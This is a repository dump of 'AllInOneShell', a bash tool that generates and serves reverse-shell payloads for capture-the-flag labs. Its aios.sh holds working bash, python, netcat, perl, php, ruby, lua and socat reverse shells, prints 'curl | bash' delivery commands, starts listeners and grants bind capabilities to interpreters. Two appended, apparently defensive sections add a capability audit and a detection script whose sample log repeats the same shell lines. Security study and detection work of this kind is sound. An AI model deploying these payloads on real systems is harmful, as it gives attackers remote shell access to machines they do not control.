├── images
│   ├── demo.png
│   └── config.png
├── README.md
└── aios.sh

/images/demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Fr3dd1e/AllInOneShell/HEAD/images/demo.png
--------------------------------------------------------------------------------

/images/config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Fr3dd1e/AllInOneShell/HEAD/images/config.png
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# AllInOneShell
by Freddie

![demo image](images/demo.png)

### Creation

I was faced with a couple of problems that made me decide to make this tool:
* Copying and pasting reverse shells directly into URLs would often break, so I would inevitably have to transfer a reverse shell from my machine remotely, then execute it with bash.
* Often, machines will not have useful programs such as `python`, which means the reverse shell will be useless.
* Running sudo for ports under 1000 gets *real* annoying.

### Features

AllInOneShell essentially tries to fix the above problems.
What it does:
- Adds network admin capabilities to python3/netcat, so no sudo is needed.
- Creates a bash script that systematically tries multiple programs to see if they are installed, and if so, connects back with a reverse shell.
- Writes the bash script to a unique temporary directory, and starts a backgrounded HTTP server there.
- Prints how to call the bash script from your local machine using `curl` or `wget`.
- Starts a netcat listener to catch any reverse shells.
- The HTTP server will time out after 5 minutes, as the process is detached.
- Added potential for command line parameters, so it can be run in batch mode if needed:
  `aios [IP] [PORT] [MODE]`

UPDATE:
- I've now incorporated a quick script I was using for generating a socat encrypted reverse shell into AIOS.
- You are now presented with the option for either the more reliable (multiple programs checked) netcat listener/file, or the encrypted socat listener/file.
- Unfortunately I couldn't include the socat reverse shell in the general bash revshell file, as it uses a different type of listener.

### Config

The default port for the HTTP server is `80` (to try and bypass some basic firewall restrictions), but this can be changed easily at the top of the script under "# Config Items".
Be aware that the HTTP process detaches, and once the reverse shell comes through it can be a pain to kill. There is a 5-minute timeout on the process, but that can also be changed in the config.

![config image](images/config.png)


### Notes

> The `nc.traditional` binary struggles to keep TCP sockets open, so I've built in a quick function to detect if it is being used by `nc`, and if so upgrades it to `ncat`, which is generally better (also supports IPv6), and more secure (isn't compiled using the GAPING_SECURITY_FLAW flag).

> Additionally, the reverse shells are currently only for Linux, but I'm definitely working on expanding this to work for Windows/PowerShell.

> This program is made specifically for HTB/THM, and should definitely not be used for anything other than boot2root machines. It is quite clunky, but it gives the advantage of convenience, as it tries to incorporate everything you need in a bash script.
> Additionally, the tmp directories are not deleted, but will be on machine restart.
> Run `rm -r /tmp/tmp-*` to do this manually.

> ```sh
> ln -sf [path to aios.sh] /usr/bin/aios
> ```

> Then to call the reverse shell tool, simply run `aios`.

> This tool only covers a few of the programs that can be used for reverse shells.
> To see more, visit https://www.revshells.com/, by the notorious 0day.
--------------------------------------------------------------------------------

/aios.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Reverse Shell Generator by Freddie

# Colours:
C=$(printf '\033')
RED="${C}[1;31m"
GREEN="${C}[1;32m"
BLUE="${C}[1;34m"
YELLOW="${C}[1;33m"
LIGHT_GREY="${C}[1;37m"
NC="${C}[0m"
UNDERLINED="${C}[4m"

# Config Items
http_port=80
http_timeout=180


# Banner (ASCII art; original column alignment did not survive extraction):
function print_banner(){
    banner='   __      __       __      __
  / /\    /\ \     /\ \    / /\
 / / \    \ \ \   /  \ \  / /  \
/ / /\ \   /\ \_\ / /\ \ \/ / /\ \__
/ / /\ \ \ / /\/_// / /\ \ \/ / /\ \___\
/ / /  \ \ \/ / / / / /  \ \_\ \ \ \/___/
/ / /___/ /\ \/ / / / / / / / /\ \ \
/ / /_____/ /\ \/ / / / / / / / / _ \ \ \
/ /_________/\ \ \___/ / /__/ / /___/ / / /_/\__/ / /
/ / /_ __\ \_\/\__\/_/___\/ / /____\/ / \ \/___/ /
\_\___\ /____/_/\/_________/\/_________/ \_____\/
'
    echo "$LIGHT_GREY$banner$NC"
    printf $RED" AllInOneShell"$NC$YELLOW" - by Freddie \n"$NC
    printf "\n"
}

# Initialise local IP/port/mode from the command line (may be empty)
export IP=$1
export PORT=$2
export MODE=$3

# Get ip/port from input:
get_ip(){
    echo -n "Enter IP: "
    read IP
}

get_port(){
    echo -n "Enter Port: "
    read PORT
}

function get_port_ip(){
    # Get ip/port from args:
    if [ "$IP" ]; then
        echo -n ""
    else
        if [[ $(ifconfig tun0 2>/dev/null | grep 'inet ' | awk '{print $2}' | wc -c) -eq 0 ]]; then
            get_ip;
        else
            echo $BLUE"[*]"$NC" VPN connection found: using tun0 as address"
            export IP=$(ifconfig tun0 2>/dev/null | grep 'inet ' | awk '{print $2}')
        fi
    fi

    if [ "$PORT" ]; then
        echo -n ""
    else
        get_port;
    fi

    # Enable sudo if port is <1000
    if [ $PORT -lt 1000 ]; then
        sudo="sudo";
        # getcap prints nothing for a binary without file capabilities, so
        # grep's exit status tells us whether the bind capability is present.
        if ! getcap "$(readlink -f /usr/bin/nc)" 2>/dev/null | grep -qi "cap_net_bind_service"; then
            echo $BLUE"[*] "$NC"Port under 1000 has been chosen, sudo is required"
        else
            echo $BLUE"[*] "$NC"Capabilities found - no need for sudo."
            echo
        fi
    else
        echo -n "";
    fi
}

# Because this exports, basically the variable needs to be exported before functions are called.
# I could rearrange the order, and pass in the IP/PORT as an arg, but realistically, I don't have the time right now.
print_banner
get_port_ip

# Shell commands:

cmd='
if command -v bash >/dev/null 2>&1; then
    echo "Command that worked: bash" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    /bin/bash -i >& /dev/tcp/IP_REPLACE/PORT_REPLACE 0>&1
    exit;
elif command -v python >/dev/null 2>&1; then
    echo "Command that worked: python" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    python -c '\''import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("IP_REPLACE",PORT_REPLACE)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'\''
    exit;
elif command -v python3 >/dev/null 2>&1; then
    echo "Command that worked: python3" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    python3 -c '\''import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("IP_REPLACE",PORT_REPLACE)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'\''
    exit;
elif command -v nc >/dev/null 2>&1; then
    echo "Command that worked: nc" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP_REPLACE PORT_REPLACE >/tmp/f
    exit;
elif command -v perl >/dev/null 2>&1; then
    echo "Command that worked: perl" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    perl -e '\''use Socket;$i="IP_REPLACE";$p=PORT_REPLACE;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'\''
    exit;
elif command -v sh >/dev/null 2>&1; then
    echo "Command that worked: sh" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    /bin/sh -i >& /dev/tcp/IP_REPLACE/PORT_REPLACE 0>&1
    exit;
elif command -v php >/dev/null 2>&1; then
    echo "Command that worked: php" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    php -r '\''$sock=fsockopen("IP_REPLACE",PORT_REPLACE);exec("/bin/sh -i <&3 >&3 2>&3");'\''
    exit;
elif command -v ruby >/dev/null 2>&1; then
    echo "Command that worked: ruby" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    ruby -rsocket -e '\''f=TCPSocket.open("IP_REPLACE",PORT_REPLACE).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'\''
    exit;
elif command -v lua >/dev/null 2>&1; then
    echo "Command that worked: lua" > /dev/tcp/IP_REPLACE/PORT_REPLACE
    lua -e '\''require("socket");require("os");t=socket.tcp();t:connect("IP_REPLACE","PORT_REPLACE");os.execute("/bin/sh -i <&3 >&3 2>&3");'\''
    exit;

# Add your own reverse shells:
#elif command -v [command] >/dev/null 2>&1; then
#    [command rev shell]
#    exit;

else
    echo "No programs installed!" > /dev/tcp/IP_REPLACE/PORT_REPLACE
fi
'

check_netcat(){
    binary=$(readlink -f "$(which nc)")
    if [[ $binary == "/usr/bin/ncat" ]]; then
        echo -n ""
    else
        echo -n $BLUE"[*]"$NC" Wrong netcat binary found, would you like to install ncat (Y/n): "
        read CHOICE
        if [[ ${CHOICE@U} == "N" ]]; then
            echo -n ""
        else
            sudo apt install ncat
        fi
    fi
}


# Install socat, if necessary
if [[ $(which socat) == "" ]]; then
    echo "${BLUE}[*]${NC} Socat is not installed!"
    sudo apt install socat -y
fi

# Add capabilities to netcat, socat and python, if not found.
# (getcap prints nothing for a binary without file capabilities, so the
# negated grep is true exactly when the bind capability is missing.)
if ! getcap "$(readlink -f /usr/bin/nc)" 2>/dev/null | grep -qi "bind"; then
    sudo setcap 'CAP_NET_BIND_SERVICE+ep' "$(readlink -f /usr/bin/nc)"
    echo $BLUE"[*] "$NC"Added network capabilities to netcat"
fi

if ! getcap "$(readlink -f /usr/bin/python3)" 2>/dev/null | grep -qi "bind"; then
    sudo setcap 'CAP_NET_BIND_SERVICE+ep' "$(readlink -f /usr/bin/python3)"
    echo $BLUE"[*] "$NC"Added network capabilities to python3"
fi

if ! getcap "$(readlink -f "$(which socat)")" 2>/dev/null | grep -qi "bind"; then
    sudo setcap 'CAP_NET_BIND_SERVICE+ep' "$(readlink -f "$(which socat)")"
    echo $BLUE"[*] "$NC"Added network capabilities to socat"
fi


function socat_listen(){
    # Check for socat itself (the original tested for nc here, which
    # contradicted the error message below).
    if command -v socat >/dev/null 2>&1; then
        echo $LIGHT_GREY"[*] "$NC"Socat listener started on port $PORT"
        exec socat -d -d OPENSSL-LISTEN:${PORT},cert=$tmp_dir/shell_public.pem,verify=0 -
    else
        printf $LIGHT_GREY"[=]"$NC" Socat is not installed on the system!\n"
    fi
}


socat_file() {

    if [[ $(echo -n $IP) == "" ]]; then
        echo "${YELLOW}[-]${NC} IP not found - exiting."
        exit
    fi

    echo "${RED}[*]${NC} Creating socat file: $tmp_dir/shell.sh"
    echo ""
    echo "socat OPENSSL:${IP}:${PORT},verify=0 EXEC:/bin/bash,pty,stderr,sigint,setsid,sane" > $tmp_dir/shell.sh
}

gen_keys() {
    echo $RED"[*] "$NC"Writing certificate/key to temp directory: ${BLUE}${tmp_dir}${NC}"
    openssl req -newkey rsa:2048 -nodes -keyout ${tmp_dir}/private_shell.key -x509 -days 365 -out ${tmp_dir}/shell_cert.crt -batch >/dev/null 2>&1
    cat ${tmp_dir}/private_shell.key ${tmp_dir}/shell_cert.crt > ${tmp_dir}/shell_public.pem
    echo
}


function use_netcat(){
    if [ $(which nc) ]; then
        echo $LIGHT_GREY"[*] "$NC"Netcat listener started on port $PORT"
        exec nc -klvnp $PORT
    else
        printf $LIGHT_GREY"[=]"$NC" Netcat is not installed on the system!\n"
    fi
}
echo $IP
echo $PORT
cmd=$(echo "$cmd" | sed -e "s/IP_REPLACE/$IP/g" | sed -e "s/PORT_REPLACE/$PORT/g")

function rev_file(){
    echo "$cmd" > "$tmp_dir/shell.sh"
    echo $BLUE"[*] "$NC"Generated revshell file: ${BLUE}${tmp_dir}/shell.sh${NC}"
    echo

}

function http_server(){
    # Uses wget's option to write to stdout, so nothing is stored on disk ;\)
    curl_cmd=$(echo "curl -s http://$IP:$http_port/shell.sh | bash" | sed -e "s/:80\//\//g")
    wget_cmd=$(echo "wget -O - http://$IP:$http_port/shell.sh | bash" | sed -e "s/:80\//\//g")
    echo $RED"[*] "$NC"Execute reverse shell:"
    echo "$curl_cmd"
    echo "$wget_cmd"
    echo
    echo $LIGHT_GREY"[*] "$NC"HTTP Server started in background"
    timeout -k 9 $http_timeout python3 -m http.server $http_port --directory $tmp_dir &
    sleep $http_timeout && rm -r ${tmp_dir} &
    sleep 1.5
    echo
}

function kill_servers(){
    other_servers=$(ps faux | grep "python3 -m http.server $http_port" | grep -v "grep ")
    pid=$(echo "$other_servers" | awk '{print $2}')
    if [[ $(echo -n "$other_servers" | wc -c) -gt 0 ]]; then
        echo $RED"[*] "$NC"Killed HTTP server running on the same port"
        kill -9 ${pid}
    fi
    echo
}


function choose_mode(){
    echo "1) Netcat multi-shell"
    echo "2) Socat encrypted shell"
    echo -n "[1|2]: "
    read MODE
}

function run_netcat(){
    check_netcat
    rev_file
    http_server
    use_netcat
}

function run_socat(){
    socat_file
    gen_keys
    http_server
    socat_listen
}


# Create temporary directory to operate from
export tmp_dir=$(mktemp -d)


if [[ "$MODE" != "" ]]; then
    echo -n ""
else
    choose_mode
fi

# Print options
printf $LIGHT_GREY"[*]"$NC" IP: $IP\n"
printf $LIGHT_GREY"[*]"$NC" PORT: $PORT\n"



case $MODE in
    1) echo $LIGHT_GREY"[*]"$NC" MODE: Netcat";
       echo ""
       kill_servers
       run_netcat
       ;;
    2) echo $LIGHT_GREY"[*]"$NC" MODE: Socat";
       echo ""
       kill_servers
       run_socat
       ;;
esac

rm -rf ${tmp_dir}

# Who knew you could write a bash script over one line long huh?
# Unfortunately both the reverse shell and the listener have to be using the --ssl flag in ncat for it to work. So it's not currently implemented.
--------------------------------------------------------------------------------
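The README's "Adds network admin capabilities to python3/netcat, so no sudo is needed" feature and the `setcap 'CAP_NET_BIND_SERVICE+ep'` block in aios.sh change the local machine permanently: from then on every script that python3 runs, and every connection socat or nc handles, can bind a port below 1024 without root. The audit below is an added example, not code from AllInOneShell or its author. It parses `getcap -r` output (a constructed sample is embedded; set `LIVE=1` to read the real system), flags interpreters and relays that carry the bind capability, and prints the `setcap -r` revert that the tool itself never performs. The basename list `RISKY_BASENAMES`, the `LIVE` and `DRY_RUN` switches and all function names are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example, not part of AllInOneShell: audit the file capability the tool
# grants. aios.sh runs `setcap CAP_NET_BIND_SERVICE+ep` on nc, python3 and socat,
# which lets anything those binaries run bind privileged ports from then on.
# This script lists such binaries from `getcap -r` output and prints the revert.

# Constructed sample of `getcap -r /usr/bin` output (not captured from a real host).
# libcap prints either "path = caps" (older) or "path caps" (newer); both appear here.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/ncat = cap_net_bind_service+ep
/usr/bin/python3.11 cap_net_bind_service=ep
/usr/bin/socat = cap_net_bind_service+ep
/usr/bin/mtr-packet cap_net_raw=ep'

# Basenames (assumed list) where cap_net_bind_service deserves a second look:
# general-purpose interpreters and relays keep the capability for everything they run.
RISKY_BASENAMES='^(python[0-9.]*|perl|ruby|php|lua|nc|ncat|netcat|socat|bash|sh)$'

# stdin: getcap lines. stdout: "path<TAB>caps" for entries carrying cap_net_bind_service.
bind_capable() {
    awk 'tolower($NF) ~ /cap_net_bind_service/ { print $1 "\t" $NF }'
}

# stdin: output of bind_capable. stdout: only the entries whose basename is risky.
flag_risky() {
    while read -r path caps; do
        base=$(basename "$path")
        if printf '%s' "$base" | grep -Eq "$RISKY_BASENAMES"; then
            printf '%s\t%s\n' "$path" "$caps"
        fi
    done
}

# stdin: getcap lines. stdout: number of risky findings.
count_risky() {
    bind_capable | flag_risky | wc -l | tr -d '[:space:]'
}

# The remediation aios.sh never performs: drop all file capabilities again.
# Prints the command unless DRY_RUN=0, so the example is safe to run anywhere.
revoke_bind_cap() {
    if [ "${DRY_RUN:-1}" = "1" ]; then
        printf 'sudo setcap -r %s\n' "$1"
    else
        sudo setcap -r "$1"
    fi
}

# Stand-alone run: the constructed sample by default, the live system with LIVE=1.
if [ "${LIVE:-0}" = "1" ] && command -v getcap >/dev/null 2>&1; then
    input=$(getcap -r / 2>/dev/null)
else
    input=$SAMPLE_GETCAP
fi
printf '%s\n' "$input" | bind_capable | flag_risky | while read -r p c; do
    printf '[!] %s has %s\n' "$p" "$c"
    revoke_bind_cap "$p"
done
```

On the sample, `ping` and `mtr-packet` are ignored because `cap_net_raw` is the capability those tools legitimately need, while `ncat`, `python3.11` and `socat` are reported. Run with `LIVE=1` on a machine where aios.sh has been used to see the same three entries appear from the real `getcap -r /` output.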
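On the target side, the tool leaves a small set of recognisable command shapes: the `curl ... | bash` and `wget -O - ... | bash` lines that `http_server` prints, and inside the generated `shell.sh` the bash `/dev/tcp/` redirection, the `mkfifo ... | nc` pipeline and the `socat OPENSSL:... EXEC:` pair. The detection pass below is an added example, not code from AllInOneShell or its author; it classifies process-execution records with those patterns and runs over a constructed sample in a simplified "epoch user cmdline" layout (198.51.100.5 is a documentation address, not a real host). The record format, the tag names and the function names are assumptions of this example, and the rules are meant to be ported to whatever process-creation telemetry (auditd `EXECVE`, an EDR's process events) is actually collected.

```shell
#!/usr/bin/env bash
# Added example, not part of AllInOneShell: a detection pass over process-execution
# records for the command shapes this tool produces on the target side.

# Constructed sample records in a simplified "epoch user cmdline" layout
# (not real telemetry; 198.51.100.5 is a documentation address).
SAMPLE_EXEC_LOG='1700000001 www-data curl -s http://198.51.100.5/shell.sh | bash
1700000002 www-data wget -O - http://198.51.100.5:8080/shell.sh | bash
1700000003 www-data /bin/bash -i >& /dev/tcp/198.51.100.5/4444 0>&1
1700000004 www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 198.51.100.5 4444 >/tmp/f
1700000005 www-data socat OPENSSL:198.51.100.5:4444,verify=0 EXEC:/bin/bash,pty,stderr,sigint,setsid,sane
1700000006 deploy curl -s https://example.com/healthz
1700000007 deploy wget -O /tmp/pkg.tar.gz https://example.com/pkg.tar.gz
1700000008 root bash /usr/local/bin/backup.sh'

# Return a tag for one command line; "benign" when no rule matches.
classify() {
    cmd=$1
    if printf '%s' "$cmd" | grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(/bin/|/usr/bin/)?(ba|da|z)?sh([[:space:]]|$)'; then
        echo remote_script_pipe      # download piped straight into a shell
    elif printf '%s' "$cmd" | grep -q '/dev/tcp/'; then
        echo bash_dev_tcp            # bash network redirection, needs no extra binary
    elif printf '%s' "$cmd" | grep -q 'mkfifo' && printf '%s' "$cmd" | grep -Eq '(^|[^[:alnum:]])(nc|ncat|netcat)([^[:alnum:]]|$)'; then
        echo fifo_netcat             # named pipe wired into nc
    elif printf '%s' "$cmd" | grep -q 'socat' && printf '%s' "$cmd" | grep -q 'EXEC:'; then
        echo socat_exec_shell        # socat address pair that spawns a program
    else
        echo benign
    fi
}

# stdin: records. stdout: "epoch user tag cmdline" for every record that is not benign.
scan_log() {
    while read -r ts user cmd; do
        [ -n "$cmd" ] || continue
        tag=$(classify "$cmd")
        [ "$tag" = benign ] && continue
        printf '%s %s %s %s\n' "$ts" "$user" "$tag" "$cmd"
    done
}

# stdin: records. stdout: number of alerts.
count_alerts() {
    scan_log | wc -l | tr -d '[:space:]'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_EXEC_LOG" | scan_log
```

The three `deploy`/`root` records show why the first rule keys on the pipe into a shell rather than on `curl` or `wget` alone: fetching a health endpoint or downloading a package to a file is routine, whereas a download that never touches disk before being executed is the README's own invocation and is worth an alert on its own.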